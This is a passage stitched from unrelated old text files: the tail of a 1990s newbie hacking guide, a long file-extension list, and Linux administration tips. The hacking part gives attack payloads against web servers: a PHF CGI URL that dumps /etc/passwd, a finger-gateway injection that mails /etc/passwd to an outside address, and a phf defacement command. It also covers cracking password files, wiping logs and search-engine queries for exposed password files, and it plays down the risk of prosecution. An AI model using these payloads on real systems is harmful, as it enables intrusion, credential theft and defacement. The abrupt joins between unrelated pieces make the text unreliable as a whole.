If it looks like that, not all the x's, just one by the usernames, then the passwd file is shadowed and cant be cracked, might as well delete it (More info on shadowed passwd's at the bottom of this file). If it isn't shadow then just type in the passwd cracking command and get ready to hack a server! I still highly recommend not doing any damage, there are many ways to get caught and just to help out the websites out there I will not tell you the ways that they can catch you, But don't worry, every 8 out of 10 servers that are aware of having an attempted hack don't report it and just go about there business. Now, one more thing, if you get on the server with root access (basically root means that you can do anything, you are God on this system) then there are log files that record what happens to you, now, I think I am handing you more than enough information, so I am going to let you found out how to wipe your presence from the system, there are plenty of .txt files out there that tell you how to do it. 3 - Website Tricks OK, now these Website tricks are "tricks" to get the passwd file without using FTP Browser or FTP Browsers. The PHF Trick OK, now this phf trick is a bit tricky (hehehe), not to use, but in the fact that some sites have added a command in there HTML code that if the phf command is issued then it will display a message like "Smile your on candid camera!" or it will say this "Your hack attempt has been logged and sent to the proper authorities." Sit the hell down, drop that shotgun, unbar your door, and stop whimpering about how your going to get busted and raped in prison by Scruffy. 90% of the time they are just bullshitting you and to them the proper authorities could be out in deep-dish-yak-dick country or in Bum Fuck Egypt. They just do that to scare the living shit out of Newbies or anybody who does that. It is bullshit, so stop worrying. OK, now on how to do the phf trick. This trick practically never works anymore, but hey, its fun to try on old school sites and stuff like that. I don't have an example site cause I really don't want to hunt down a site that this trick works on, so go find on yourself and don't send me e-mail about how you can't find a site that this doesn't work on. In order to do this trick the site must have a /cgi-bin/ directory. If it doesn't, then just leave it and forget the whole damn thing on that site, but if it does then keep reading. I am going to make this quick, an example would be this: http://www.Imanasshole.org/cgibin/phf?Qalias=x%0a/bin/cat%20/etc/passwd That will bring up the passwd file, but 95% of the time you'll get this very common and even more very crappy error about how the file doesn't exist. OK, that's the phf trick. Now, onto the finger-box hacking trick. Finger-Box Hacking Again for the finger-box hack to work you have to find a website with the /cgi-bin/ directory. I am just going to post the basic outline of commands

for this cause my fingers are getting very tired of typing this :-). example of finger-box hack is this: http://www.XXXXX.com/cgi-bin/finger

An

After you type that in you will get a box, if you don't then the finger isn't there or you don't have access to it, and in the box type this: nobody@nowhere.org ; /bin/mail me@junk.org < etc/passwd Substitute where necessary, I have never actually gotten this trick to work cause I've never tried it more than once or twice cause I never needed it, but I knew about it so go crazy :-). Rewriting A Web page Right From Your Web Browser In order to do this trick again you need the /cgi-bin/ directory on your "target" site. For example, type this when you have a website that has the /cgi-bin/ directory: http://www.XXXXX.com/cgi-bin/phf?Qalias=x%0a/bin/echo%20 "some stuff"%2 "Some stuff" is whatever you want to add basically, but beware, sometimes the web site can track you using the cookies that you sent while on there page, so just to be sure that they don't have cookie requests, if you have Netscape, then in the configuration somewhere, I forget where, check the box that says "Enable alert when accepting a cookie" or something that looks along the lines of that. 4 - Neat stuff/Misc. The first thing I am going to cover is just some very interesting tricks that I know about AltaVista, http://www.Altavista.com. These tricks only involve you typing in something for the search query. OK, here are a list of words and things that will bring up very interesting files from websites: root: root passwd.txt wwwadmin.cgi wwwboard.cgi wwwadmin.pl wwwboard.pl passwd (Note: supposed to bring up UNIX passwd files but I havent tried it, so if you try it send me some e-mail and let me know what happens). wwwboard (Note: brings up the wwwboard directories so you can look for the passwd.txt file and other neat stuff). master.passwd (Note: again, never tried it, so send me some feedback, let me know if it is even actually worth some1's time of typing it in, or just a hoax). OK, those AltaVista for your something words work in about almost any search engine, but work best with because AltaVista searches the links on the pages in it's archive word, and almost every page has a link to it's passwd file or other that is of interest.

OK, now this next trick I thought of when I d/led HakTek to check it out it had a feature of deleting mail-bombed messages, now, if you don't have

HakTek, and don't want it/can't find it, then just go into the mail directory of your web browser, and delete all the mail and the mail bomber has wasted his time. Now I am just going to give you some UNIX commands and what they do, so if you want to be a UNIX fan or LINUX fan then check these out: cd X - X = the directory that you want to switch to ls - list all the files in a directory, excluding the hidden ones ls -a - lists all the files in a directory, including the hidden ones ls -A - lists all the hidden files in a directory, but not the . and .. ls -ALF - lists the properties of all the files in a directory cd .. - goes down one directory/subdirectory cd . - absolutely nothing! quit - log off the ftp site (obviously only on Win95 FTP) Those commands listed above work on BOTH FTP sites AND UNIX machines, now here are commands that work ONLY on UNIX machines: cat X - the file you want to view vi - Visual Editor that you can use to edit files edit - edit files (not sure on this one, works on some UNIX's) ed - edit files (on all machines) chmod - change the ownership of a file help - list of commands that you can use (Note: * next to command means that it is not used on that certain UNIX machine) man X - for further information on a CERTAIN UNIX command whereas X is the command that you want more information on Well, that about does it for this file, but I really didn't want to wrap it up so I am going to add some links that will help you A LOT in your travels, so visit all these links for all the tools and other things that you'll need: http://www.hackersclub.com - A great site, I give it two-thumbs up :-). http://project-one.com - Under Construction, where this file was intended). http://hackers.com - Under MAJOR Construction, going to be one of the best hacking sites ever, home of Revelation, I don't know him, but if he is reading this file, then Hi revelation! :-). http://www.adirtroad.com - TONS of neat things, and TONS of free-stuff links, again, two-thumbs up :-). http://easyweb.easynet.co.uk/~davegraham/britpack.htm - Brit Hack Pack, there was a rumor going around that there files had virii, that is a bunch of BS, I support them completely, even though I'm not British :-). http://www.wtp.net/~xeno/main.htm - An all around good site http://www.geocities.com/SiliconValley/3078/frame2.html - Well, I really only included this link cause the leader of this group and the guy who runs the page loves to cause mass destruction, and he's funny to watch, so keep being funny Senate :-). http://www.WorkingDesigns.com - Absolutely nothing to do with hacking just a great place to go if you have any of there RPG games, hope they finish the site sometime soon... and my final link: http://www.freestuff.com - You remember that site right?? I thought so; guess what you find there??? Well, I hope you enjoyed this file and learned a lot from it, I certainly put a lot of typing into it, so if you really want to send me some money.... I mean a donation, hehe, don't, keep your money, cause I'm sure you have better things to spend it on then giving it to me :-), *mentally smacking myself for

refusing money*. OK, well, I will probably write a lot more files cause I enjoy writing Newbie stuff, so well, if you want to E-mail me the send mail to: RAWTAZ@CONNIX.COM And I will get back to you whenever I can. someday :-). Hang in there, you'll get there

My "Quote" Of The Day (hehe): Frustrated Person: "WHY WON'T THIS DAMN THING WORK?!?!?!?" Calm, Clean Shaven Teacher: "Examine it, what do you find wrong with it?" Frustrated Person: "NOTHING, IT IS BROKEN!!!" Calm, Clean Shaven Teacher: "You are to quick to anger, learn patience." Frustrated Person: "WHY PATIENCE, ITS BROKEN!!!!!!!" Calm, Clean Shaven Teacher: "It's not plugged in." Frustrated Person: "Oh, I knew that." Moral of story: Patience is the ultimate weapon -Phooey

ABK Corel Draw AutoBackup ACL Corel Draw 6 keyboard accelerator ACM Used by Windows in the system directory ACP Microsoft Office Assistant Preview file ACT Microsoft Office Assistant Actor file ACV OS/2 drivers that compress and decompress audio data AD After Dark screensaver ADB Appointment database used by HP 100LX organizer ADD

OS/2 adapter drivers used in the boot process ADM After Dark MultiModule screensaver ADP Used by FaxWorks to do setup for fax modem interaction ADR After Dark Randomizer screensaver AFM Adobe font metrics AF2 ABC Flowchart file AF3 ABC Flowchart file AI Adobe Illustrator drawing AIF Apple Mac AIFF sound ALB JASC Image Commander album ALL Arts & Letters Library AMS Velvert Studio music module (MOD) file ANC Canon Computer Pattern Maker file that is a selectable list of pattern colors

ANI Animated Cursor ANS ANSI text API Application Program Interface file; used by Adobe Acrobat APR Lotus Approach 97 file APS Microsoft Visual C++ file ARC LH ARC (old version) compressed archive ARJ Robert Jung ARJ compressed archive ART Xara Studio drawing ART Canon Crayola art file ASA Microsoft Visual InterDev file ASC ASCII text ASD WinWord AutoSave ASM

Assembler language source file ASP Active Server Page (an HTML file containing a Microsoft server-processed script) ASP Procomm Plus setup and connection script AST Claris Works "assistant" file ATT AT&T Group 4 bitmap AVI Microsoft Video for Windows movie AWD FaxView document BAK Backup file BAS BASIC code BAT Batch file BFC Windows 95 Briefcase document BG Backgammon for Windows game BI Binary file

BIF GroupWise initialization file BIN Binary file BK Sometimes used to denote backup versions BK$ Also sometimes used to denote backup versions BKS An IBM BookManager Read bookshelf BMK An A bookmark file BMP Windows or OS/2 bitmap BM1 Apogee BioMenace data file BRX A file for browsing an index of multimedia options BSP Quake map BS1 Apogee Blake Stone data file BTM Batch file used by Norton Utilities B4

Helix Nuts and Bolts file C C code CAB Microsoft cabinet file (program files compressed for software distribution) CAL CALS Compressed Bitmap CAL Calendar schedule data CAS Comma-delimited ASCII file CAT IntelliCharge categorization file used by Quicken CB Microsoft clean boot file CCB Visual Basic Animated Button configuration CCF Multimedia Viewer configuration file used in OS/2 CCH Corel Chart CCM Lotus CC:Mail "box" (for example, INBOX.CCM) CDA CD Audio Track

CDF Microsoft Channel Definition Format file CDI Phillips Compact Disk Interactive format CDR Core Draw drawing CDT Corel Draw template CDX Corel Draw compressed drawing CEL CIMFast Event Language file CFB Comptons Multimedia file CFG Configuration file CGI Common Gateway Interface script file CGM Computer Graphics Metafile CH OS/2 configuration file CHK File fragments saved by Windows Disk Defragmenter or ScanDisk CHP

Ventura Publisher chapter CIL Clip Gallery download package CIM Sim City 200 file CIN OS/2 change control file that tracks changes to an INI file CK1 iD/Apogee Commander Keen 1 data file CK2 iD/Apogee Commander Keen 2 data file CK3 iD/Apogee Commander Keen 3 data file CK4 iD/Apogee Commander Keen 4 data file CK5 iD/Apogee Commander Keen 5 data file CK6 iD/Apogee Commander Keen 6 data file CLASS Java class CLP Windows Clipboard file CLS Visual Basic Class Module

CMD Command file for Windows NT (similar to a DOS .BAT file) CMD DOS CP/M command file CMD dBase-II program file CMF Corel Metafile CMP JPEG Bitmap CMP Address document CMV Corel Move animation CMX Corel Presentation Exchange image CNF Configuration file used by Telnet, Windows, and other applications CNM Windows application menu options and setup file CNQ Compuworks Design Shop file CNT Windows (or other) system content files for the help index and other purposes COB

trueSpace2 object COD Microsoft C compiler output as displayable assembler with original C as comments COM Command file (program) CPD Fax Cover document CPE Fax Cover document CPI Microsoft MS-DOS code page information file CPL Control Panel extension CPL Corel colour palette CPP C++ code CPR Corel Presents Presentation CPT Corel Photo-Paint image CPX Corel Presentation Exchange Compressed drawing CRD Cardfile file

CRP Corel Presents Run-Time Presentation CRT Certificate file CSC Corel Script CSP PC Emcee On-Screen image CSV Comma-separated values file CT Scitex CT Bitmap CTL Used in general to mean a file containing control information. CUE Microsoft Cue Cards data CUR Windows Cursor CUT Dr Halo bitmap CV Corel Versions archive CV Microsoft CodeView information screen CWK

Claris Works data file CWS Claris Works template CXX C++ source code file DAT Data file DAT WordPerfect Merge Data DBF Aston-Tate dBASE database DBX DataBeam image DCR Shockwave file DCS Desktop Color Separation file DCX Fax image (based on PCX) DDF BTRIEVE database DEF SmartWare II data file DEF C++ Definition

DER Certificate file DIB Device-Independent Bitmap DIC Dictionary DIF Data Interchange Format spreadsheet DIR Macromedia Director file DIZ Description file DLG C++ Dialogue Script DLL Dynamic-Link Library DMF X-Trakker music module (MOD) file DOC FrameMaker or FrameBuilder document DOC WordStar document DOC WordPerfect document DOC

Microsoft Word document DOT Microsoft Word document Template DPR Borland Delphi project header file DRV Driver DRW Micrografx Designer/Draw DSG DooM saved game DSM Dynamic Studio music module (MOD) file DSP Microsoft Developer Studio project DSQ Corel QUERY file DSW Microsoft Developer Studio workspace DWG AutoCAD drawing eXchange format DXF AutoDesk Drawing Interchange format EMF Enhanced Windows Metafile

ENC Encore file EPS Encapsulated PostScript image ER1 ERWin file ERX ERWin file EVY Envoy document EWL Microsoft Encarta document EXE Executable file (program) F FORTRAN file F77 FORTRAN file F90 FORTRAN file FAR Farandole Composer music module (MOD) file FAV Microsoft Outlook navigation bar FAX

FAX Type image FH3 Aldus Freehand 3 drawing FIF Fractal image file FITS CCD camera image FLC AutoDesk FLIC animation FLI AutoDesk FLIC animation FLT Corel filter FLT StarTrekker music module (MOD) file FMB Oracle binary source code for form, version 4.0 and later FMT Oracle text format of form, version 4.0 and later FMT Microsoft Schedule+ print file FMX Oracle executable form, version 4.0 and later FOG Fontographer font

FON System font FOR FORTRAN file FOT Font-related file FP FileMaker Pro file FP1 Flying Pigs for Windows data file FP3 FileMaker Pro file FPX FlashPix bitmap FRM Form FRM FrameMaker or FrameBuilder document FRM Oracle executable form version 3.0 and earlier FRM Visual Basic form FRM WordPerfect Merge form FRX

Visual Basic form stash file GAL Corel Multimedia Manager album GCP Ground Control Point file used in image processing of remote sensing data . GED Graphic Environment Document (drawing) GEM GEM metafile GEN Ventura-Generated text file GFC Patton&Patton Flowcharting 4 flowchart file GFI Genigraphics Graphics Link presentation GFX Genigraphics Graphics Link presentation GID Windows 95 global index file (containing help status) GIF CompuServe bitmap GIM Genigraphics Graphics Link presentation GIX Genigraphics Graphics Link presentation

GNA Genigraphics Graphics Link presentation GNX Genigraphics Graphics Link presentation GRA Microsoft Graph GRD Grid file, used in image processing of remote sensing data often to form map projections. GRP Program Manager Group GTK Graoumftracker (old) music module (MOD) file GT2 Graoumftracker (new) music module (MOD) file GWX Genigraphics Graphics Link presentation GWZ Genigraphics Graphics Link pres H C program header HED HighEdit document HEL Microsoft Hellbender saved game HEX

Macintosh BinHex 2.0 file HGL HP Graphics Language drawing HLP Help file HOG Lucas Arts Dark Forces WAD file HPJ Visual Basic Help Project HPP C++ program header HQX Macintosh BinHex 4.0 file HST History file HT HyperTerminal HTM Hypertext document HTML Hypertext document HTX Extended HTML template ICA Citrix file

ICB Targa bitmap ICM Image Color Matching profile file ICO Windows Icon IDD MIDI Instrument Definition IDQ Internet Data Query file IFF Amiga ILBM IGF Inset Systems metafile IIF QuickBooks for Windows interchange file IMA WinImage file IMG GEM image INC Assembler language or Active Server include file INF Information file INI

Initialization file INP Oracle source code for form, version 3.0 and earlier INS InstallShield install script INS X-Internet sign-up file ISO Lists the files on a CD-ROM; based on the ISO 9660 CD-ROM file system standard ISP X-Internet sign-up file ISU InstallShield uninstall script IT Impulse Tracker music module (MOD) file IW Idlewild screensaver JAR Java ARchive file (a compressed file for applets and related files) JAVA Java source code JBF Paint Shop Pro image browser file JFF JPEG bitmap

JIF JPEG bitmap JMP SAS JMPDiscovery chart-to-statistics file JN1 Epic MegaGames Jill of the Jungle data file JPEG JPEG bitmap JPG JPEG bitmap JS JavaScript source code JTF JPEG bitmap KDC Kodak Photo-Enhancer KFX KoFax Group 4 image KYE Kye game data

LBM Deluxe Paint bitmap LDB Microsoft Access lock file

LEG Legacy document LHA Alternate file suffix for LZH LIB Library LIS Output file produced by a Structured Query Reporting (SQR) program LOG Log file LPD Helix Nuts and Bolts file LRC Intel Video Phone file LST List file LWO Lightwave Object file LWP Lotus Wordpro 96/97 file LZH LH ARC compressed archive LZS Skyroads data file M3D

Corel Motion 3D animation MAC MacPaint image MAD Microsoft Access module MAF Microsoft Access Form MAK Visual Basic or MS Visual C++ Project MAM Microsoft Access Macro MAP Map file MAP Duke Nukem 3D WAD game file MAQ Microsoft Access Query MAR Microsoft Access Report MAS Lotus Freelance Graphics Smartmaster file MAT Microsoft Access Table MAX Paperport file

MAZ Hover maze data MB1 Apogee Monster Bash data file MCC Dialer10 calling card MCS MathCAD image MCW Microsoft Word for Macintosh document MDA Microsoft Access add-in MDB Microsoft Access database MDE Microsoft Access MDE file MDL Digital Tracker music module (MOD) file MDL Quake model file MDN Microsoft Access blank database template MDW Microsoft Access Workgroup MDZ

Microsoft Access wizard template MED Music Editor, OctaMED music module (MOD) file MER Format for interchanging spreadsheet/database data; recognized by Filemaker, Excel, and others MET Presentation Manager metafile MI Miscellaneous MIC Microsoft Image Composer file MID MIDI music MMF Microsoft Mail File MMM Microsoft Multimedia Movie MOD FastTracker, StarTrekker, Noise Tracker (etc.) music module file MOD Microsoft Multiplan spreadsheet MOV QuickTime for Windows movie MPE MPEG animation

MPEG MPEG animation MPG MPEG animation MPP Microsoft Project file MPP CAD drawing file format MP3 MPEG Audio Layer 3 (AC3) file MSG Microsoft Mail message MSN Microsoft Network document MSP Microsoft Paint bitmap MTM MultiTracker music module (MOD) file MUS Music MVB Microsoft Multimedia Viewer file MWP Lotus Wordpro 97 Smartmaster file NAP

NAP Metafile NCB Microsoft Developer Studio file NSF Lotus Notes database NST Noise Tracker music module (MOD) file NTF Lotus Notes database template OBD Microsoft Office binder template OBD Microsoft Office Binder OBJ Object file OBZ Microsoft Office Binder Wizard OCX Microsoft Object Linking and Embedding custom control OFN Microsoft Office FileNew file OFT Microsoft Outlook template OKT Oktalyzer music module (MOD) file

OLB OLE Object Library OLE OLE object OPT Microsoft Developer Studio file ORG Lotus Organiser file OR2 Lotus Organiser 2 file OR3 Lotus Organiser 97 file P10 Tektronix Plot 10 drawing PAB Microsoft Personal Address Book PAK Quake WAD file PAL Windows colour palette PAT Corel Draw pattern PBK Microsoft Phonebook PBM

Portable Bitmap PCD Kodak Photo-CD image PCL HP Laserjet bitmap PCS PICS animation PCT Macintosh PICT drawing PCX ZSoft PC Paintbrush bitmap PDF Adobe Acrobat Portable Document Format or Netware Printer Definition File PDF Package Definition File from Microsoft Systems Management Server PDQ Patton&Patton Flowcharting PDQ Lite file PFA Type 1 font (ASCII) PFB Type 1 font (binary) PFC PF Component PFM Printer Font Metrics

PGL HP Plotter drawing PGM Portable Graymap (bitmap) PIC PC Paint bitmap PIC Lotus picture PIC Macintosh PICT drawing PIF Program Information File PIF IBM PIF drawing PIG Lucas Arts Dark Forces WAD file PIN Epic Pinball data file PIN Epic Pinball data file PIX Inset Systems bitmap PJ MKS Source Integrity file PKG

Microsoft Developer Studio application extension (similar to a DLL file) PL Perl program PLT HPGL Plotter drawing PLT AutoCAD Plot drawing PM5 Pagemaker 5.0 file PM6 Pagemaker 6.0 file P65 Pagemaker 6.5 file PNG Portable Network Graphics bitmap PNG Paint Shop Pro Browser catalogue PNT MacPaint graphic file POT Microsoft PowerPoint Template PP4 Picture Publisher 4 bitmap PPA Microsoft PowerPoint Add-in

PPM Portable Pixelmap bitmap PPS Microsoft PowerPoint slide show PPT Microsoft PowerPoint presentation PRE Lotus Freelance presentation PRF Windows system file PRN Print Table (space delimited text) PRS Harvard Graphics for Windows presentation PRZ Lotus Freelance Graphics 97 file PS Postscript Interpreted drawing PSD Adobe Photoshop bitmap PST Microsoft Outlook Personal Folder File PTM Polytracker music module (MOD) file PUB

Ventura Publisher publication PUB Microsoft Publisher document PWD Microsoft Pocket Word document PWZ Microsoft PowerPoint Wizard PXL Microsoft Pocket Excel spreadsheet

QAD PF QuickArt Document QBW QuickBooks for Windows file QDT Quick Books data file from the Quicken UK Accountancy/Tax/Invoice program QLB Quick Library QRY Microsoft Query QT QuickTime Movie QTM QuickTime Movie

QXD Quark XPress file R Pegasus Mail resource file RA Real Audio sound RAM Real Audio sound RAS Sun Raster Images bitmap RAW Raw File Format (bitmap) RC Microsoft Visual C++ Resource Script REC Recorder macro REG Registration file RES Microsoft Visual C++ Resource RFT RFT-DCA RLE Run-Length Encoded bitmap RM

Real Audio video file RMI MIDI music ROV Rescue Rover data file RPT Microsoft Visual Basic Crystal Reports file RTF Rich Text Format document RTM Real Tracker music module (MOD) file

SAM Ami Professional document SAV Saved game file SCC Microsoft Source Safe file SCD Matrix/Imapro SCODL slide image SCD Microsoft Schedule+ 7 SCH Microsoft Schedule+ 1

SCN trueSpace2 scene SCP Dial-Up Networking Script SCR Windows screensaver SCR Fax image SCT Scitex CT bitmap SC2 Microsoft Schedule+ 7 SDL SmartDraw library SDR SmartDraw drawing SDT SmartDraw template SEA Self-expanding archive (used by Stuffit for Mac files and possibly by others) SEP Tagged Image File Format (TIFF) bitmap SHB Corel Show presentation SHB

Document shortcut file SHG Hotspot bitmap SHS Shell scrap file SHW Corel Show presentation SIT Stuffit archive of Mac files SLK Symbolic Link (SYLK) spreadsheet SND NeXT sound SND Mac Sound Resource SQC Structured Query Language (SQR) common code file SQR Structured Query Language (SQR) program file STM Scream Tracker music module (MOD) file STY Ventura Publisher style sheet SVX Amiga 8SVX sound

SYS System file S3M Scream Tracker 3 music module (MOD) file TAR Tape Archive TAZ Unix Gzip/Tape Archive TEX Texture file TGA Targa bitmap TGZ Unix Gzip/Tape Archive THEME Windows 95 Desktop Theme THN Graphics Workshop for Windows thumbnail TIF Tag Image File Format (TIFF) bitmap TIFF Tag Image File Format (TIFF) bitmap TIG Tiger file, used by US government to distribute maps TLB

OLE Type Library TMP Windows temporary file TRM Terminal file TRN MKS Source Integrity project usage log TTF TrueType font TWF TabWorks file TWW Tagwrite Template TX8 MS-DOS Text TXT Text T2T Sonata CAD modelling software file

UDF Windows NT Uniqueness Database File ULT Ultratracker music module (MOD) file

URL Internet shortcut USE MKS Source Integrity file VBP Visual Basic Project VBW Microsoft Visual Basic workspace VBX Visual Basic custom control VCF Vevi Configuration File; defines objects for use with Sense8's WorldToolKit VDA Targa bitmap VI Virtual Instrument file from National Instruments LABView product VLB Corel Ventura Library VOC Creative Labs Sound Blaster sound VP Ventura Publisher publication VSD Visio drawing (flow chart or schematic) VST

Targa bitmap VSW Visio Workspace file VXD Microsoft Windows virtual device driver

WAD Large file for Doom game containing video, player level, and other information WAV Windows Waveform sound WB1 QuattroPro for Windows spreadsheet WB2 QuattroPro for Windows spreadsheet WBK Microsoft Word Backup WBL Argo WebLoad II upload file WCM WordPerfect Macro WDB Microsoft Works database WEB CorelXara Web document

WGP Wild Board Games data file WID Ventura width table WIL WinImage file WIZ Microsoft Word Wizard WK1 Lotus 123 versions 1 & 2 spreadsheet WK3 Lotus 123 version 3 spreadsheet WK4 Lotus 123 version 4 spreadsheet WKS Lotus 123 Worksheet spreadsheet WKS Microsoft Works document WLF Argo WebLoad I upload file WLL Microsoft Word Add-In WMF Windows Metafile WOW

Grave Composer music module (MOD) file WP WordPerfect document WPW Novel PerfectWorks document WP4 WordPerfect 4 document WP5 WordPerfect 5 document WP6 WordPerfect 6 document WPD WordPerfect Demo WPD WordPerfect Document WPG WordPerfect Graphic WPS Microsoft Works document WPT WordPerfect Template WQ1 QuattroPro/DOS spreadsheet WQ2 QuattroPro/DOS version 5 spreadsheet

WRI Write document WRL Virtual Reality model WS1 WordStar for Windows 1 document WS2 WordStar for Windows 2 document WS3 WordStar for Windows 3 document WS4 WordStar for Windows 4 document WS5 WordStar for Windows 5 document WS6 WordStar for Windows 6 document WS7 WordStar for Windows 7 document WSD WordStar 2000 document WVL Wavelet Compressed Bitmap

XAR

Corel Xara drawing XLA Microsoft Excel add-in XLB Microsoft Excel toolbar XLC Microsoft Excel chart XLD Microsoft Excel dialogue XLK Microsoft Excel backup XLM Microsoft Excel macro XLS Microsoft Excel worksheet XLT Microsoft Excel template XLV Microsoft Excel VBA module XLW Microsoft Excel workbook / workspace XM FastTracker 2, Digital Tracker music module (MOD) file XR1 Epic MegaGames Xargon data file

XTP XTree data file XY3 XYWrite III document XY4 XYWrite IV document XYP XYWrite III Plus document XYW XYWrite for Windows 4.0 document

YAL Arts & Letters clipart library YBK Microsoft Encarta Yearbook Z Unix Gzip ZIP Zip file ZOO An early compressed file format 000-999 Used to number old versions of files and number related data files 12M

Lotus 123 97 Smartmaster file 123 Lotus 123 97 file 2GR and 3GR VGA Graphics driver/configuration files under Windows 386 A file for use in an 80386 or higher microprocessor 669 Composer 669, Unis Composer music mod file #01 and higher A method of numbering picture files for a roll of film that has been scanned $$$ Used by OS/2 to keep track of archived files @@@ Screen files used in the installation and instruction on use of applications Tips

Speeding up your hard drive (#1) Get faster file transfer by using 32-bit transfers on your hard drive

Just add the line:

hdparm -c3 /dev/hdX

to a bootup script.

If you use SuSE or other distros based on SYS V,

/sbin/init.d/boot.local should work for you.

This enables 32-bit transfer on your hard drive. On some systems it can improve transfer performance by 75%.

To test your performance gain, type:

hdparm -t -T /dev/hdX

Protecting yourself from being a spam base(#2) Sendmail allows for someone to telnet to port 25 and do an expn (expand) to see what users and aliases are on your machine. Also, vrfy (verify) means someone can get legal e-mail addresses from your box and send spam through your machine.

Don't want that, so look in your /etc/sendmail.cf file for a line that looks like this:

############### # Options # ###############

Now cut and paste these next few lines below that:

# turning off the expand option and requiring a helo from # a remote computer

Opnoexpn,novrfy,needmailhelo

Now there is no expansion, no verify, and sendmail requires a helo with a legitimate DNS in order to use the mailer.

Then look in your /etc/mail/aliases file and ensure you have only your own boxen and/or subnet in there as OK or RELAY. That will help cut down on spammers' ability to find relay machines to do their dirty work for them.

Cleaning up Netscape crashes(#3) You have a tip about Netscape leaving copies of itself running below, but you can make a general shell script to clean up a Netscape crash like this:

#!/bin/sh #kill.netscape killall -9 netscape rm ~/.netscape/lock

Then all your users can use it and clean up the dreaded hundred instances of Netscape running when it crashed. Change netscape to netscape-communicator or netscape-navigator as appropriate

More DOS-like commands(#4) Many people are moving to Linux because they miss the stability of good old DOS. In that light, many users are typing DOS commands (which originated from UNIX in the first place) that look fine but cause errors. The command "cd.." in DOS is perfectly valid, but Linux balks. This is because "cd" is a command, and any parameter for that command must be separated from the command by a space. The same goes for "cd/" and "cd~". A quick fix is here.

Use your favorite text editor in your home directory to edit the file ".bashrc". The period is there on purpose, this hides the file from normal ls display.

Add the lines:

alias cd/="cd /" alias cd~="cd ~" alias cd..="cd .."

And I usually add these...

alias md="mkdir" alias rd="rmdir -i" alias rm="rm -i"

and my first and still favorite alias...

alias ls="ls --color"

alias is a powerful tool, and can be used in the .bashrc script as well as from the command line. You can, if you want to spend the time, create your own group of shell commands to suit how you work. As long as you put them in your .bashrc file, they'll be there everytime you log in. Note that if you frequently log in as root, you might want to copy /home/username/.bashrc to /root/.bashrc to keep yourself sane.

Resurrecting corrupted floppies(#5) Here's how to make a floppy disk with "track-0 bad" reusable again:

If the track zero of a floppy disk is found to be bad, no DOS or Windows utility is going to do anything about it--you just have to throw it in your unrecycle bin.

This tip cannot recover the data, but can make the disk carry things again, at least for the time being (moments of desperation).

How to:

(A) Format the disk with Linux. Build a Linux file system (don't use mformat). I did this some time before by invoking the makebootdisk command (in Slakware) and stopped after the formatting was over. There should be better ways to do it in RedHat 5.2 or other recent versions.

( Reformat the disk with Windows. Use the DOS window and the /u option while formatting.

Using DOS-like commands(#6) There's a package called mtools which is included with most of the distributions out there.

There are several commands for basic DOS stuff. For example, to directory the floppy drive, type mdir a:. This is rather handy--you don't need to mount the floppy drive to use it.

Other commands are: mattrib , mcd, mcopy, mdel, mformat, mlabel, mren (rename), mmd, mrd, and mtype.

This doesn't work for reading from hard disks. In that case, you would add entries to /etc/fstab, drive type msdos for fat16 partitions, and vfat for fat32.

Copying files from Linux to Windows 98 or 95B (FAT32)(#7)

It's as easy as installing the program explore2fs. It uses a Windows Explorer interface and supports dragand-drop. I have found it reliable and useful for migrating files from my RedHat 6.1 partition to my Win95B partition quickly and with a minimum of fuss.

It's available free--as all software should be--from this URL: CODE http://uranus.it.swin.edu.au/~jn/linux/explore2fs.htm

Installing in partitions(#8) I am using SuSE Linux, which has some interesting options (I don't know if RedHat or other distributions offer you this, too).

1. You can install Linux on a single file in your Windows Partition. Nice to try it out, but I guess it is not that fast then. You can load it then with a DOS program, loadlin.

2. Use Fips or Partition Magic. Defragment your hard drive (you should do this for Point 1, too) and split it up. I guess most users just have one partition, which you should split up into at least three: one for the Linux files, and a smaller swap partition (take about 32 to 64 MB, depending on your RAM--less RAM needs bigger swap partitions). If you decide later to deinstall Linux you can always delete both partitions and create one big one for Windows again.

Fips is a stupid command line program, but if you're too lazy to read at least a little bit, then you should stop thinking about Linux anyway...

Command Pipelines(#9) Pipes are easy. The Unix shells provide mechanisms which you can use them to allow you to generate remarkably sophisticated `programs' out of simple components. We call that a pipeline. A pipeline is composed of a data generator, a series of filters, and a data consumer. Often that final stage is as simple as displaying the final output on stdout, and sometimes the first stage is as simple as reading from stdin. I think all shells use the "|" character to separate each stage of a pipeline. So:

data-generator | filter | ... | filter | data-consumer

Each stage of the pipeline runs in parallel, within the limits which the system permits. Hey, look closely, because that last phrase is important. Are you on a uni-processor system because if you are, then obviously only one process runs at a time, although that point is simply nitpicking. But pipes are buffers capable of holding only finite data. A process can write into a pipe until that pipe is full. When the pipe is full the process writing into it blocks until some of the data already in the pipe has been read. Similarly, a process can read from a pipe until that pipe is empty. When it's empty the reading process is blocked until some more data has been written into the pipe.

What is IP masquerading and when is it of use?(#10) IP masquerading is a process where one computer acts as an IP gateway for a network. All computers on the network send their IP packets through the gateway, which replaces the source IP address with its own address and then forwards it to the internet. Perhaps the source IP port number is also replaced with another port number, although that is less interesting. All hosts on the internet see the packet as originating from the gateway.

Any host on the Internet which wishes to send a packet back, ie in reply, must necessarily address that packet to the gateway. Remember that the gateway is the only host seen on the internet. The gateway rewrites the destination address, replacing its own address with the IP address of the machine which is being masqueraded, and forwards that packet on to the local network for delivery.

This procedure sounds simple, and it is. It provides an effective means by which you can provide second class internet connections for a complete LAN using only one (internet) IP address.

Setting UTC or local time(#11) When Linux boots, one of the initialisation scripts will run the /sbin/hwclock program to copy the current hardware clock time to the system clock. hwclock will assume the hardware clock is set to local time unless it is run with the --utc switch. Rather than editing the startup script, under Red Hat Linux you should edit the /etc/sysconfig/clock file and change the ``UTC'' line to either ``UTC=true'' or ``UTC=false'' as appropriate. Setting the system clock(#12)

To set the system clock under Linux, use the date command. As an example, to set the current time and date to July 31, 11:16pm, type ``date 07312316'' (note that the time is given in 24 hour notation). If you wanted to change the year as well, you could type ``date 073123161998''. To set the seconds as well, type ``date 07312316.30'' or ``date 073123161998.30''. To see what Linux thinks the current local time is, run date with no arguments.

Setting the hardware clock(#13) To set the hardware clock, my favourite way is to set the system clock first, and then set the hardware clock to the current system clock by typing ``/sbin/hwclock --systohc'' (or ``/sbin/hwclock --systohc -utc'' if you are keeping the hardware clock in UTC). To see what the hardware clock is currently set to, run hwclock with no arguments. If the hardware clock is in UTC and you want to see the local equivalent, type ``/sbin/hwclock --utc''

Setting your timezone(#14) The timezone under Linux is set by a symbolic link from /etc/localtime[1] to a file in the /usr/share/zoneinfo[2] directory that corresponds with what timezone you are in. For example, since I'm in South Australia, /etc/localtime is a symlink to /usr/share/zoneinfo/Australia/South. To set this link, type:

